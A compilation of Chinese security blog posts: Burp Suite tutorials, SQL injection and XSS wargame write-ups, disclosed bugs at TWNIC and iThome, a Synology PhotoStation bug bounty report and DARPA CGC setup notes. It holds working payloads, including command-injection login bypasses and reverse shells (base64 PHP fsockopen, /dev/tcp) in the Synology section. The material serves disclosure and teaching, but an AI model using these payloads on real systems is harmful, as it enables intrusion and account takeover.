2. 如果想要對以前送過的封包做修改的話，就點proxy->http history->網址點選右鍵->send to repeater。封包就會送到repeater那邊給你自由修改啦 a. 點進去repeater裡面，左邊是可以讓你修改的。 b. 改好以後按一下go c. 右邊就是他的response

(右邊旁邊的HTML也可以看到網頁被修改完的樣式唷)

3.Spider的話就是把你站內的站臺都去爬一次。打開來的話，會發出很大量的packet喔 4.Scanner 又可以分成主動和被動式的掃描 5. Intruder 去挖掘未知的漏洞。從剛剛Proxy裡面，按右鍵 send to intruder

按positions 的地方可以選擇你的attack type，或是去payloads的地方選你的payload。(simple list字典檔、大小寫、暴力破解、插入無效字元等等)

6.sequencer是用來算id使用的。比較少用到。 7.decoder是用來作文字的編碼和解碼。 8.comparer是把封包丟進去。可以來做前後改變的比較。

 SQL INJECTION, 工具 los.eagle-jump-4-orc_用Burp Suite解決

第四題的第二種解法–使用Burp Suite來自動破解密碼

1. 先將FireFox 設定localhost:8080(配合Burp Suite 使用) 用前一篇的狀況來接續。(因為這一篇是要講Burp Suite來破解密碼)

我們開Burp Suite來看封包的狀況

可以看到裡面有藍色的pw和紅色一串字。

pw=%20%27%20or%20(id=%27admin%27%20and%20substring(pw,1,1)=%272%27)%20%23

這是什麼呢 顆顆 先回到target->site map 裡面->los.eagle-jump.org->右鍵->send to intruder

點選intruder的頁籤->positions->attack type 選擇pitchfork(針對有效負仔變數逐一測試)

在我們想要改變數的地方，前後加上$(可以按右邊的按鈕)

pw=%20%27%20or%20(id=%27admin%27%20and%20substring(pw,§1§,1)=%27§2§%27)%20%23

然後我們到payloads的頁籤去調整參數

1.設定第一個payload(密碼長度)

payload set = 1 payload type = Numbers(只會有阿拉伯數字)

我們已經知道有8位數，所以range 設定from 1 to 8，step 1(每個位子相隔一個)

2.設定第二個payload(設定密碼)

payload set = 2

payload type = brute forcer(密碼只會有英文數字和阿拉伯數字)

這時候就會看到下面的character set列出全部的英文字母a-z和數字0-9的清單

因為我們是要字元，所以位數最短是1，最長也是1

準備好囉

start attack 他就會跳出另外一個視窗 (因為是free edition,跑得有點慢  要等一下) 最後跑出了288種結果，結果那麼多，怎麼知道正確解釋哪一組呢?

我們回到los.eagle-jump的頁面

我們來檢視兩種情況:正確和不正確的(出現hello admin 和沒有的)(分別送出兩種結果的封包) (可以用?pw= ‘ or (id=’admin’ and substring(pw,1,1)=’2′) %23和?pw= ‘ or (id=’admin’ and substring(pw,2,1)=’2′) %23 來測試) 然後把封包結果送出去comparer(選取兩個後按右鍵->send to comparer responses)

就會出現兩個結果。我們按右下角的words來做比較 可以藉由顏色的標註來發現哪裡不一樣:content-length不同

(因為正確的封包多了hello admin)

所以我們就知道正確和錯誤的差異點，是在長度 

針對length來排列 發現有八個的長度是5251，其他都是5231(剛好就是我們的八位數密碼嗎?) (按右鍵來highlight一下) filter-> 勾選only show highlighted items) 我們看payload2(因為paylaod1 是排序) 出現295d5844

破關的方法很多種~ 找到適合自己的那種~就是最佳解答

SQL INJECTION los.eagle-jump-6-darkelf-writes up

第六題~

先看看前面有過濾什麼。 在第二個if的地方:

if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");

他把and和or都過濾掉了。 所以等等如果有要用到這樣字元的話，我們要改成 && 和 || 來表示。 從前面幾題學到，有一個小小的起手勢:

?pw= ‘ or  1 %23 or 不能用，我們改成 ?pw= ‘ || 1 %23

結果跑出: Hello guest

至少可以控制一個情況會出現 True了 而且程式已經跑到倒數第三行了

接下來呢，他是要id=’admin’，才會solve。 ?pw= ' || 1 && id='admin' %23 這邊&&要用URLencode ?pw= ' || 1 %26%26 id='admin' %23

這樣就破關了

補充一下，為什麼要把&&做urlencode呢

因為在PHP裡面，&後面接的是變數或變量。如果沒有用endoe的話，語句裡面會判定他後面接的是變量，變成參數傳遞。這和and的意思是完全不一樣的。

為了不要讓這種事情發生，就需要先用encode的方式，讓語句不會斷掉。

SQL INJECTION los.eagle-jump-7-orge-writes up

這題會使用前幾題用過的Burp Suite來解

參照前不知道幾題的做法

先把前面都註解掉。他要找id=admin的就給他下條件 至於密碼長度和密碼位元嘛，就先打一下。等等是要用Burp Suite，最後這些都會變成可以改的變數。

?pw=’ || (id=’admin’ %26%26 substring(id,1,1)=’a’) %23

 打開Burp Suite吧 找到剛剛的封包，丟到intruder裡面

先clear所有$，再把長度和要猜的字元變成變數:

選擇cluster bomb

payloads第一個變數組態設定如下(可以參考前幾題怎麼設定)

payload set :1 payload type: Numbers From: 1 to: 9 step:1

第二個變數組態設定如下:

payload set:2 payload type Brute forcer min length:1 max length:1

 start attack!!

跟前幾題一樣。看長度的變化(這樣打會不會太偷懶啊…>"<)

最後排序一下 密碼為6c864dec 打進去 ?pw=6c864dec

可以看到設定判別密碼的網址帶了兩個參數key及dn，key是一串亂碼，而dn則是個人中文網域名稱(灰色方塊部分)。

->透過此網址可重複修改密碼

接著就收到一封邀請好友的信件，點擊信中連結輸入好友Gmail信箱，成功推廣可以有抽獎點數。

但點進去推廣頁面，看了網址所帶的參數覺得怎麼有種似曾相識的感覺？

推廣頁面和設定密碼的頁面所使用的key竟然是同一把！

如果任何人知道你的中文網域名稱及邀請頁面連結，代入KEY及網域名稱到設定密碼頁面，即可修改他人的判別密碼。

https://rs.twnic.net.tw/cgi-bin/eai/chgpass.cgi?key= (KEY) &dn= (網域名稱).台灣

用修改後的密碼登入就可以取得原域名擁有者的所有權限，可以更改DNS設定、查看或修改個人資料等等。

如果你公布了你的網域名稱，順便附上信中的推廣連結，等於是告訴人：來吧，可以幫我改密碼喔。

為了避免關鍵key外流，我推廣好友自己打Gmail信箱總安全了吧，這樣想就大錯特錯了！

就算自己打信箱推廣，被推廣好友所收到確認信所含連結也有那把可以重設密碼的key(右下黃色區塊)。總之，如果要推廣好友，絕對不能把我的網域名稱告訴他人，不然他就能幫忙改密碼並接管自己的個人網域了。

->同一人所發出邀請key皆相同，參數rec不同被推廣者皆不相同。

之後把情況詳情回報給台灣網路資訊中心，當天幾小時後重設密碼的頁面就自動跳轉到https://rs.twnic.net.tw/cgi-bin/eai/chgpass.cgi 乾淨的網址，改成用Form Data的形式送出key & dn，本來想說這根本只是把漏洞變得比較不明顯，資料送出的形式改變而已，問題根本沒有修復阿。

幸好隔天重設密碼的流程就換了，改成只回傳一個<script> alert，提示至信箱確認變更密碼連結，他人就不再能簡單取得個人網域權限了，當天的修改貌似只是不想讓更多人能一眼就發現並使用這個漏洞。

設定密碼的頁面所使用的key (灰色部分)終於不是那組連推廣都共用的那把了。

查了一下此活動開始也有一段時間了，不過看起來還沒有人發現。為了避免更多資料外洩，當天即送出了問題回報，他們也非常快速的解決了問題，在隔天即修復完成。除了讓人佩服工程師的努力外，正面面對漏洞修補的態度也值得讚賞。

這個問題的根本原因就是重設密碼所用的token也被其他服務所使用，而該推廣中文域名活動的服務剛好會讓token流出給第三者，而讓外人可以輕易取得域名管理權限。其實只要多留意並不難發現這個漏洞，但它還是存在了幾個禮拜的時間，這也說明了網路上並不是沒有漏洞，而是缺少發現。身為使用者可以多仔細觀察，協助政府或企業發現問題。而開發者則要注意並不是使用亂數當token就安全，也要注意在設定密碼這種比較敏感的服務和其他一般服務所使用的token必須要有所區隔。

時間：

例外的部分，如果有共用的程式庫，經過審核修正，可以當核可使用的程式庫， 委外開發或客製化時，可以要求廠商遵守相關標準，並且寫到合約裡面。 使用開源軟體的話，建議就其授權條款的部份以及資安的部份要有所評估，例如如果要用 wordpress 的話，可以就其資安，包括 SQL injection 的部分評估一下。 採購軟體的話，在評估階段可以試著跟原廠確認一些資安問題如 SQL injection 的處理方式， 沒有辦法確認有力人士又要買的話，可以考慮從黑箱的方式測試(也許用 sqlmap之類的工具)，並考慮導入 web application firewall 或者靠 IDS/IPS，但可能會面對 bypass 的問題[^1]、false positive 問題等等。 另外，作業系統的強化(hardening)，資料庫的帳號的權限最小化，資料庫中，程式使用的帳號權限也可以分割最小化，只碰觸的到該碰的到的 databases/tables/views，也可以減少 SQL injection 發生時的問題。

企業可以做個資盤點，然後訂出資料分類處理政策，比較高等級的資料可以要求儲存加密，這樣在一般的狀況下，SQL injection 時的損害可以縮小。 

比較敏感的系統，可以作滲透測試，減少別的問題讓系統破功的機會。

還有，從 logs 或 security events 也有機會偵測可能的 SQL injection 攻擊，然後做進一步的確認跟處理[^2]。

從維運端看，有時候資料庫軟體會出補丁或是安全更新，也必須要及時評估，有的資料庫因為24x7 運行，要上補丁要協調時間麻煩，但必要的安全性更新要排除困難儘速安排時間上。

光是這些還是有可能有漏失，還有一些其他的流程可以來互補，例如可以導入 bug bounty 方案，能給獎金是最好，經費少或是沒有經費可以考慮送公司自己的產品，或是有個網頁寫感謝詞。 不作 bug bounty，也要讓人在頁面上找得到通報資安問題的管道。

如果發生 SQL injection 事件，並涉及個資，在資安事件處理過程中，要找法務與公關部門參與，並要求人員非經許可不可對外發言，沒有公關人員陪同不可接受採訪，以免被記者誤導或是斷章取義。

最後，如果高層願意支持，可以做一些資安認證，如果經費許可，建議贊助一些資安相關的年會以及學會，展現良好的資安態度。

按右鍵檢測網頁原始碼，search for “aaa"

欸斗…字有點小

放大看看

<b>"aaa'bbb"ccc>ddd<eee"</b><hr class='red'>

eee跟後面已經和在一起不見了

 所以這時候我們就可以直接用

alert(document.domain);

包起來

出現下面的畫面:

就可以成功囉

左下角會出現這樣的圖示

進入下一關

 XSS Chanllenges stage #2 writes up

按照起手勢打: aaa’bbb"ccc<ddd>eee

結果發現只剩下

aaa’bbb

代表雙引號出現了事情

看網頁原始碼

<input type="text" name="p1" size="50" value="aaa'bbb"ccc>ddd<eee">

 表示在ccc以前都變成一組的了

如果我們要插入東西，就要把前面先close掉

於是乎

我們用">把前面的語句先結束，再接我們的東西

">alert(document.domain)<"

 XSS Chanllenges stage #3 writes up

一樣aaa’bbb"ccc>ddd<eee

結果都存在!!

這是有點危險的喔

因為可能做過html的轉換

所以看看原始碼:

<b>"aaa&#039;bbb&quot;ccc&gt;ddd&lt;eee"</b>

 果然真的耶

這樣就沒有XSS的行為發生

呵呵

這時候又要用到Burp Suite啦

結果發現他送的結果，除了aaabbbccc之外，還多送一個Japan(最後一行)

點選Parms(就是Parameters的縮寫，會顯示參數，主要為GET,POST的訊息)

又再一次確認說參數裡面有把Japan送出去

為了要改這個啊，把Proxy->intercept->on

重新回到測試題庫頁面。這次不要輸入東西，直接送出

在Raw裡面的最下面一行，會出現

p1=+%22aaa%27bbb%22ccc%3Eddd%3Ceee%22&p2=Japan

這時候把Japan換成aaa'bbb"ccc>ddd<eee

再把intercept off

 這時候會發現頁面已經吃進參數了

回到Burp Suite看Response

特寫一下:

第一個紅框是剛剛吃進去的

第二個紅框是我們用Burp suite改的第二個參數

很明顯的 第二個框框裡面沒有被改編碼

仔細看，到小於之前都還存在。

再用一次Burp Suite

改後面的參數

p1=%22aaa%27bbb%22ccc%3Eddd%3Ceee&p2=alert(document.domain);

就過囉

XSS Chanllenges stage #4 writes up

長得跟第三題蠻像的

起手勢:aaa’bbb"ccc>ddd<eee

結果又是回傳完整的句子

We couldn’t find any places called “aaa’bbb"ccc>ddd<eee" in Japan.

我們再打開Burp Suite看一下剛剛傳送的情形:

結果發現這題回傳有三個參數:

p1=&p2=Japan&p3=hackme

比對網頁上的狀況，沒有p3=hackme的輸入的地方，表示是hidden input。

那就不客氣囉直接在p3加語句

p1=aaa%27bbb%22ccc%3Eddd%3Ceee&p2=Japan&p3=alert(document.domain);

因為插的位子是在input裡面

所以少一個雙引號和大於(“>)

 回到Burp Suite再一次

就有囉

XSS Chanllenges stage #5 writes up

第五題

突然想到前幾題都忘記提供超連結。連結如下:

http://xss-quiz.int21h.jp/stage–5.php

 這一題呢，什麼也沒有

看起來蠻有挑戰的(假的假的  不要怕)

我們還是開個Burp Suite吧

先在search裡面打aaa’bbb"ccc>ddd<eee看看

結果發現一段蠻特別的結果:

中間的"ccc>斷掉了。

ddd好像又和之後不知道什麼東西接上了。

不要怕

檢視網頁原始碼看看

雖然前面有maxlength="15″可是看起來好像也沒有什麼影響。

只是還是老問題 input裡面先結束掉。(用  “>  )

一樣，

用Burp Suite在p1參數的地方打

“> alert(document.domain);

按送出

就可以過關囉

目前Susie這邊只有將詳解寫到第五題．陸陸續續會繼續更新上傳．

Vul-01: PhotoStation Login without password

We mostly focus on PhotoStation, which is the picture management system enabled in most Synology DSM ( DiskStation Manager ).

The first vulnerability allowed us to login as admin without entering the password.

PoC1:

GET //photo/login.php?usr=admin&sid=xxx&SynoToken=/bin/true HTTP/1.1 Host: bamboofox.hopto.org User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br X-Forwarded-For: | Cookie: stay_login=0; language=en; PHPSESSID=ime6mqrg0pghbjo4p9aomqcbv0; left-panel-visibility=show Connection: close

The key points are the | character in the X-Forwarded-For field and /bin/true in the get parameter SynoToken. The server site CGI will concatenate the strings in usr, X-Forwarded-For and SynoToken into a command and execute the command, and the special characters | and > aren’t filtered out correctly, which will lead to the command injection vulnerability.

Therefore in our PoC1, the command will become:

/usr/syno/bin/synophoto_dsm_user username | /bin/true

The command will return 0 (True) and thus bypass the authentication.

Result: Adversary can login as admin without password

Adversary can also login as admin by the following PoC:

GET /photo/photo_login.php ?action=login&username=admin&password=%26

The source code that handle the user authentication are in photo_login.php:

$retval = csSYNOPhotoMisc::ExecCmd('/usr/syno/bin/synophoto_dsm_user', array('--auth', $user, $pass), false, $result);

Once the $pass variable is &, the command will be executed in the background and always return 0 (true), thus the adversary can login as admin.

Vul-02: PhotoStation Remote Code Execution

After we successfully login as admin via the command injection vulnerability, we extended the attack surface to attempt remote code execution.

PoC2: 1 . Encode the command into base64 format base64encode( $sock=fsockopen("......",8080);exec("/bin/sh -i <&3 >&3 2>&3"); ) => JHNvY2s9ZnNvY2tvcGVuKCIzNi4yMzEuNjguMjE1Iiw4MDgwKTtleGVjKCIvYmluL3NoIC1pIDwmMyA+JjMgMj4mMyIpOw== 2 . Send the payload GET //photo/login.php?usr=|&sid=php&SynoToken=eval%28base64_decode%28%22JHNvY2s9ZnNvY2tvcGVuKCIzNi4yMzEuNjguMjE1Iiw4MDgwKTtleGVjKCIvYmluL3NoIC1pIDwmMyA%2bJjMgMj4mMyIpOw%3D%3D%22%29%29%3B HTTP/1.1 Host: bamboofox.hopto.org User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br X-Forwarded-For: -r Cookie: stay_login=0; language=en; PHPSESSID=ime6mqrg0pghbjo4p9aomqcbv0; left-panel-visibility=show Connection: close

We adopted a similar approach (PoC1) in order to achieve RCE. We then took a deep look into the source code of PhotoStation, and found the following code:

if ($x_forward) { $ip = $x_forward; } // ... $retval = csSYNOPhotoMisc::ExecCmd('/usr/syno/bin/synophoto_dsm_user', array('--current', $user, $session_id, $ip, $synotoken), false, $isValidUser); if ($retval === 0) { $login_status = true; } else { // login failed }

In this code snippet, $user, $ip and $synotoken can be easily controlled by crafting the HTTP headers, and that’s the original cause of the command injection vulnerability. Our first few attempts failed due to the site filtered out some special characters. However, we noticed that the site did not filtered out all the special characters. Here’s the code that indicated the non-filtered characters:

static $skipEscape = array('>', '<', '|', '&');

As a result of the code above, >, <, | and & can be used to achieve command injection.

Vul-03: Read-Write Arbitrary Files

After we got the shell, we continued to find security flaws in the DSM. The binary program synophoto_dsm_user got our attention. This binary is a setuid program, and has a powerful copy function. With the --copy root parameter, it will do the cp command and copy a file with the root permission. This make us have the ability to read/write an arbitrary file .

Vul-04: Privilege Escalation

With the previous Vul-02 ( RCE ) and Vul-03 ( Read-Write Arbitrary Files ), we can exploit the vulnerability and escalate our privilege to root. We first tried modify the /etc/crontab file, but failed due to the AppArmor protection. So we change our target to the file that will be invoked by crontab. Finally we found /tmp/synoschedtask, a task which will be invoked by crontab as root. We use synophoto_dsm_user to modify its file content to the following command:

/volume1/photo/bash -c '/volume1/photo/bash -i >& /dev/tcp/x.x.x.x/yyyyy 0>&1'

Now we can wait for our reverse shell, with the root permission.

Also by exploiting Vul-02 and Vul-03, we’re able to login the service as admin. If the admin is logged in, we can use the following command to get the admin’s session ID:

usr/syno/bin/synophoto_dsm_user --copy root /usr/syno/etc/private/session/current.users /volume1/photo/current.users

Although the server side will check the admin’s IP address, but the check can be bypassed easily by forging the X-Forwarded-For header.

Login as admin give us the ability to execute command with the root permission. For example, we can execute our own command as root with the help of Task Scheduler. This result in a privilege escalation as well.

Vul-05: DoS via Blocking IP

We also found some other security flaws. If a user sends too many requests to forget_passwd.cgi, the user will be blocked by his IP, which is retrieved from the X-Forwarded-For header. However, X-Forwarded-For can be easily forged from the client side, therefore an attacker can block as many users as he wants by forging the X-Forwarded-For header, leading a DoS attack.

Vul-06: Local File Inclusion

There’s a LFI (Local File Inclusion) vulnerability in download.php. The id parameter is controllable.

For example, we can use ../../../../../../var/services/homes/[username]/.gitconfig to download a user’s git config file.

Timeline

2016/07/25 Report vulnerabilities to Synology

2016/09/01 Confirm that all vulnerabilities have already been fixed by Synology

2017/03/13 Confirm that we’re allowed to publish the bug bounty report

2017/03/20 Synology Bug Bounty Report published

Note

看到圖你就已經應該知道你該要弄什麼手法之後來踹看看了XD 在看第二張

對xD ，很明顯了有個表單之後也有action 來傳送該表單所填入的訊息傳回到伺服器，可以利用看看是否有CSRF ，但是看到上圖有個值為 (_token ) 來判斷用戶表單所發出的相關請求驗證或者用戶身份驗證，所以如果來說此會話如果有效那麼利用起來是無法造成跨站存域漏洞的，所以我去掉該值( token ) 試試

之後把區塊表單HTML 程式碼貼上在本機測試(已經去掉Token ) ，所以我們嘗試看看是否會有效果。

然後在本機開啟為儲存表單的網頁

然後輸入你要修改的任何密碼，之後確定

噔噔！！ＸＤ 竟然密碼修改成功了！此事證明了那組在個人資料(修改密碼) 區域 token 是沒有達到驗證或讓這組發揮作用，導致了CSRF ，這是極為嚴重漏洞，因為攻擊者可以構造Poc 和表單一模一樣的程式碼(HTML) 語法，之後上傳到自己網站伺服器(第三方網站) 。

若使用者訪問此網站那麼你的密碼就會被惡意攻擊者修改(劫持帳號) ，但是你可能又會說他修改了我不是會跳回原本的會員中心之後提示成功不是會有所警覺嗎(在修改回來就好)，但是相對攻擊者可以在程式碼寫個自動填入他要的一組密碼之後再傳送成功及跳回其他網站，沒有顯示相關成功頁面就好XD

更何況iT邦幫忙論壇使用者名稱是帳號所以發給特定受害者就可以達到目標了

最後回憶剛剛那組code

在第八行連結個人檔案後面有個數字ID ，我也認為應該是工程師效驗用戶身份或來對每個使用者登入發請求的認證請求ID ，但是他也是和會話並沒有效果，所以數字可以亂填都沒有影響在修改密碼過程中。

最後我認為最根本原因，是這組token 沒有真正發揮他要有的作用導致可以隨便輕鬆劫持每個用戶帳戶

之後把情況詳情回報給了iThome ，他們也非常快的響應漏洞和修復速度，讓我不僅佩服目前自己見過全台灣修復、回應最快的公司之一，值得企業、政府效仿對象！

影片測試漏洞連結：

https://drive.google.com/file/d/0ByrwRfdtgouycWtrNk1xNHZTczA/view

時間：

2017/3/12 ：漏洞詳情和poc 回報給iThome

為了即時呈現現場七隊攻防系統，成千上萬的封包流動，DARPA發展了一套軌跡檢視器（Trace Viewer）。在這個檢視器中，可以顯示程式的運行方式，看程式運行了哪些程式碼，在哪邊跑了個分枝，在哪邊做了個迴圈。而各種程式結構，都會組成特別的形狀，我們可以據以了解程式行為。若我們未來能藉由這樣的檢視器，讓我們能更直接快速的了解程式行為，有可能可以降低許多分析的時間。

而根據不同程式的運行方式，也可以來比較修補前後的差異在哪邊，如同下圖便是修補前後程式的軌跡，我們可以觀察前面那條路徑比較早結束，而較後面那條路徑重覆的執行了許多相同的動作後才結束。

除了比較偏重於程式層級的視覺化介面以外，DARPA也為CGC準備的一套競技場檢視圖，即時反應比賽期間各隊的互動。在這個圖片中，每個隊伍都以一張卡片表示，這張卡片稱為Team Card。每個卡片中包含多個六角形圖示，每個小圖示就代表一個Challenge Binary，即是要進行攻防的程式。 其中從畫面前端射向六角形的光束，代表者所有進入的封流量，包含著一般正常流量及攻擊流量。而在各隊間互相射擊的光束，代表各隊間的攻防，若是有攻擊成功，便會有道光束指向被攻擊的服務。

https://www.youtube.com/watch?v=8deTat4-O7M

以上影片詳細的為大家說明這些圖代表的意義，我們也會為大家做一些簡要說明。我們也截圖幫大家整理一下。 這樣的圖示，代表這一支程式正常運行

在圖示中間圓圈中，多了一層藍色的光環，則代表這支程式有加入IDS，類似於防火牆的防禦。

下面的圖示，則代表這個程式正在修補中，為模擬真實世界，當你在進行程式修補時，會有一回合的時間，是會將程式離線的。

最後一個圖示與上面類似，當隊伍放上新的IDS規則時，這個服務也會離線一回合。

在比賽過程中，會有兩種流量進到各個程式。其中白色圓球的部份代表Service Polls，這代表現實世界中的正常流量，而程式比需正確處理這些流量，並將正常程式正常的反應輸出。若是因為修補上的錯誤，沒有正確處理這類流量，則會被扣分。 另外，黃色箭頭（或其他顏色）則是代表POV（攻擊流量），各隊則須透過修補程式或用IDS防禦，阻擋這類攻擊。箭頭的顏色則代表攻擊的隊伍。

而這些服務(程式)被攻擊後，其狀態也會隨之改變。如下圖所示，若是服務被其他隊伍攻陷，則服務會變成攻擊隊伍的顏色。 而白色圓圈在接近程式時（六角型圖片），也會改變顏色，紅色代表這個poller是失敗的，該隊會被扣分。而綠色則代表一切正常。

讓我們將所有東西結合起來，就會如以下影片所展示，這便是CGC時參賽成員所會看到的。

基礎平台設定

        首先，Darpa官方提供了一組Vagrant的設定，可以快速幫我們設定好這套系統，並自動裝好系統中的機器。Vagrant是一套自動化開發環境建構的工具，提供自動化虛擬機器的設定及建構功能。安裝Vagrant，可至Vagrant官網下載安裝程式，按照指令即可安裝Vagrant系統。接著，我們可以來建立實驗環境，依照以下指令安裝cgc環境。

mkdir cgc2 wget https://s3.amazonaws.com/cgcdist/boxes/Vagrantfile vagrant up

你會看到以下畫面，代表vagrant正在安裝多台CGC平台機器。                

安裝完成後，我們可用以下指令觀察系統狀態。

vagrant status

可以看到vagrant已經架設五台機器，並都做好設定。利用vagrant我們可以向操作虛擬機器一樣操作這些機器，例如：suspend, resume, halt, destroy                

從這些訊息中，我們可以看到有多台機器，各機器角色如下：

cb：這台機器使用來放置並運行競賽程式（Challenge Binary）。

ids：這台機器會擋在cb的前面，所有進來的流量，會先經過這台機器，在網路曾進行過濾。而過濾的規則各個隊伍透過ti進行設置。

pov：這台機器負責送出攻擊碼（漏洞驗證碼，pov），而送出後會先經由ids再到cb這台機器，做最後的執行與判斷攻擊是否成功。

crs：這台機器用來模擬CRS系統，其實不在CGC平台中，所以這台機器會透過ti這台機器，來與CGC平台溝通。

vagrant ssh

ti(Team Interface): 這台機器用作於當作CGC系統的介面，各隊伍可以利用這個介面取得或更新更像資訊，像是上傳Patch過後的程式或下載別隊的程式，都要透過這個介面。 我們可以用以下指令，連進這台機器：

vagrant ssh ti

cb介紹及實例

        我們現在已經把機器跑起來，下一步則是要安裝比賽用的題目，我們這邊拿CQE的CADET_00003這個題目來練習。可以依照以下指令編譯這道題目。

cd /usr/share/cgc-sample-challenges/examples/CADET_00003 sudo make build generate-polls install

程式執行檔位於 /usr/share/cgc-sample-challenges/examples/CADET_00003/bin。我們直接執行這隻程式結果如下：

我們可以看到Segmentation Fault出現了！！代表讀者已經完成這一題了XD，當然這是為了demo方便，實際上題目不會比這個簡單。所以我們可以去看pov檔案來驗證我們的想法，在pov資料夾中，有一些主辦方已經寫好的攻擊程式（pov）如下。                 

可以看到他做的事與我們差不多，這個攻擊碼也是送了一堆A來造成程式錯誤，應該是一個經典的buffer overflow漏洞。

replay poller/for-release/GEN_00001.xm

<?xml version=“1.0” standalone=“no” ?> <!DOCTYPE pov SYSTEM “/usr/share/cgc-docs/replay.dtd”> <pov> <cbid>service</cbid> <seed>ec640096e6c1a14ed790ac57e1af6a5735ad9c9094e94bf01c54800625181db12c9bcd2f50f8d76e3477cb0f8cd95975</seed> <replay>     <read><delim>\x0a</delim><match><data>\x0a</data></match></read>     <read><delim>\x0a</delim><match><data>Welcome to Palindrome Finder\x0a</data></match></read>     <read><delim>\x0a</delim><match><data>\x0a</data></match></read>     <read><length>37</length><match><data>\x09Please enter a possible palindrome: </data></match></read>     <write><data>f8uvu9HY9fJmvWnccovA4hDdc\x0a</data></write>     <read><delim>\x0a</delim><match><data>\x09\x09Nope\x2c that\x27s not a palindrome\x0a</data></match></read>     <read><delim>\x0a</delim><match><data>\x0a</data></match></read>     <read><length>37</length><match><data>\x09Please enter a possible palindrome: </data></match></read>     <write><data>XV3MHHvJp\x0a</data></write>     <read><delim>\x0a</delim><match><data>\x09\x09Nope\x2c that\x27s not a palindrome\x0a</data></match></read>     <read><delim>\x0a</delim><match><data>\x0a</data></match></read>     <read><length>37</length><match><data>\x09Please enter a possible palindrome: </data></match></read>     <write><data>bGqRQMgK69RzHhT7ssKwotKOoqk8\x0a</data></write>     <read><delim>\x0a</delim><match><data>\x09\x09Nope\x2c that\x27s not a palindrome\x0a</data></match></read> </replay> </pov>

接著我們來測試攻擊碼能不能成功，cb-test這個工具可以幫我們完成相當多的測試。

cd /usr/share/cgc-sample-challenges/examples/CADET_00003 cb-test  –xml_dir pov –director bin –cb CADET_00003 –should_core

可以看到Type 1 POV 成功。在官方資料中，也有給修補過後的程式，位置在：

/usr/share/cgc-sample-challenges/examples/CADET_00003/bin/CADET_00003_patched

讀者也可以跑一下看看發生什麼事。以下指令則測試binary是否能通過poller test，測試你的修補沒有破壞程式原有功能。

cb-test –cb CADET_00003 –directory bin –xml poller/for-release/GEN_00001.xml

最後一個跟cb相關的要件是ids，我們可以在ids資料夾下面看到ids設定，這個檔案大多是依靠七個自定義行為，及一些regular expression來處理。        

虛擬競賽

現在我們也瞭解一個binary的狀況了，最後我們利用官方的虛擬競賽，來體會機器人在比賽中要做的各項功能

。要開啟一場虛擬的比賽，需要以下步驟。

ti-rotate –roundlen 300

ti-server

現在該到我們的重點了，我們可以先到crs這台機器上，這台機器象徵我們的自動攻防機器，所以所有操作都會在這台機器上。那讓我們先到這台機器。

vagrant ssh

進入CRS機器後，可以利用ti-client取得比賽資訊，或上傳下載資料。

在上圖，我們分別利用round, scoreboard, teams指令，查詢當前回合, 各隊分數以及各隊編號。接著，我們介紹如何利用各種操作進行比賽。 其中feedback指令可以幫我們看一下現在binary的狀況，以及各攻擊代碼的效能。

比賽中，我們需要撰寫攻擊程式碼以攻擊其他隊伍，因此我們首先透過ti-client上傳攻擊程式碼。         

接著我們同樣去上傳我們的修補程式，避免被其他隊攻擊。

我們也可以利用ti-client的upload_ids去上傳ids rule。 最後consensus指令可以幫我們取得其他隊的程式及IDS rule         

你說他沒有跟主流接軌? 不能這樣說，光CTF不具產業趨勢、光Symbolic Execution雖能當學術研究，但你如何證明你是最好的? CGC企劃成功串起了 CTF、自動化分析、產業趨勢、Machine learning等相關議題，便給予資安環境相當高的貢獻。

任何一隊發展出來的CRS系統，不是主辦單位驗證你的系統好，而是你透過比賽脫穎而出而證明你系統夠強，Darpa讓CGC企劃從基本的DECREE啟蒙，並且建立了一個評斷制度，加上透過CGC冠軍最後要加入人類駭客戰局(DEFCON CTF)的這個操作，創造了能見度，讓這個企劃有走下去的可能，這才是最成功的地方。

接下來，為了讓各位更迅速了解8/4 的CGC 比賽，究竟主辦方提供了什樣的環境，讓這七隊機器人能公平的在上面一較高下，我們會說明CGC的專有名詞。

DECREE全名是 DARPA Experimental Cybersecurity Research Evaluation Environment 是DARPA提供出來的一個專門用來做電腦安全研究的Open Source作業系統，它包括以下幾個特性:

單純性(Simplicity)  : 目前主流作業系統很複雜，至少提供了上百個系統呼叫，DECREE僅有7個，這種簡單的特性才能讓電腦自動分析漏洞，否則電腦根本無法分析。DECREE 也用自己的檔案格式，是改過的ELF格式，單一入口點，只有Main入口點而不像我們現在動態函式庫(如：dll, so)可能包含多個入口點，降低分析難度。

可重現性(High Determinism)  DECREE 調整過OS kernel，能夠紀錄完整的程式執行流程，這個特性非常重要，正常世界中有許多不確定因素，如時間、亂數等等，會讓漏洞分析相當困難。有程式執行流程才有辦法確認問題點，並重現問題或程式運作狀況。

限制性 (Incompatibility)  DECREE 和上面的檔案格式是專門設計給電腦安全研究，因此有自己的格式、跟主流作業系統的code和protocol並沒有一致，也就是，DECREE上面的程式漏洞沒辦法用在真實世界的作業系統，真實世界的程式漏洞沒辦法用在DECREE裡面。

DECREE 已經Open Source提供給相關漏洞分析、CTF競賽、及相關資安研究運用。可以從以下Github下載

https://github.com/CyberGrandChallenge/

把這些東西兜在一起，就是CGC決賽的畫面，如下：

本文部分參考於DARPA網站

        Shellphish成員表示，Shellphish是一隻成立已久的CTF團隊，一直以來都相當活躍，並參與相當多的CTF競賽。當DARPA宣布CGC計畫時，他們認為，這就是駭客攻防的未來。 Shellphish的自動推論系統MECHANICAL PHISH是基於Angr建構而成的。Angr是一個軟體套件，可用來建構分析深層程式碼的系統。Angr同時利用靜態及動態符號化（Symbolic Execution）執行，可以適用於多種不同的分析情境。這是一套Open Source的工具，大家可以到以下網址去研究他們系統。

https://github.com/angr

也可以參酌這兩年在駭客年會上相關的文章

From DEFCON to the Cyber Grand Challenge

Binary 自動分析的那些事

